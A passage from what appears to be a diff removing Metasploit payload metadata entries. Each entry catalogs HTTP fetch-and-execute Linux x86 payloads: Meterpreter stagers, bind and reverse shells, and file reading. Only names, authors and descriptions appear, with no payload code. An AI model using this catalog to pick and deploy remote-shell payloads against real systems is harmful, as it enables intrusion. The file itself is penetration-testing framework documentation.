- "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nUse an established connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/find_tag", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": 
"linux/x86/meterpreter/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/reverse_nonx_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/reverse_tcp_uuid": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/http/x86/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/x86/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": 
"payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/x86/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/x86/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/x86/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": 
"payload/cmd/linux/http/x86/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/metsvc_bind_tcp": { - "name": "HTTP Fetch, Linux Meterpreter Service, Bind TCP", - "fullname": "payload/cmd/linux/http/x86/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/metsvc_bind_tcp", - "staged": 
false - }, - "payload_cmd/linux/http/x86/metsvc_reverse_tcp": { - "name": "HTTP Fetch, Linux Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/x86/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/metsvc_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/read_file": { - "name": "HTTP Fetch, Linux Read File", - "fullname": "payload/cmd/linux/http/x86/read_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hal" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/read_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/read_file", - "staged": false - }, - "payload_cmd/linux/http/x86/shell/bind_ipv6_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID 
Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/http/x86/shell/bind_nonx_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/x86/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/http/x86/shell/bind_tcp": { - "name": "HTTP Fetch, Linux 
Command Shell, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/http/x86/shell/bind_tcp_uuid": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": 
"cmd/linux/http/x86/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/http/x86/shell/find_tag": { - "name": "HTTP Fetch, Linux Command Shell, Find Tag Stager", - "fullname": "payload/cmd/linux/http/x86/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/find_tag", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/http/x86/shell/reverse_ipv6_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/http/x86/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from an HTTP 
server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/http/x86/shell/reverse_nonx_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - 
"payload_cmd/linux/http/x86/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/http/x86/shell/reverse_tcp_uuid": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": 
"cmd/linux/http/x86/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/http/x86/shell_bind_ipv6_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/http/x86/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection over IPv6 and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [], - 
"platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_bind_tcp_random_port": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/http/x86/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Geyslan G. Bem ", - "Aleh Boitsau " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", - "EDB-41631" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_find_port": { - "name": 
"HTTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/http/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_find_port", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_find_tag": { - "name": "HTTP Fetch, Linux Command Shell, Find Tag Inline", - "fullname": "payload/cmd/linux/http/x86/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": 
"cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_find_tag", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle ", - "joev " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_reverse_tcp_ipv6": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/http/x86/shell_reverse_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Matteo Malvica " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": 
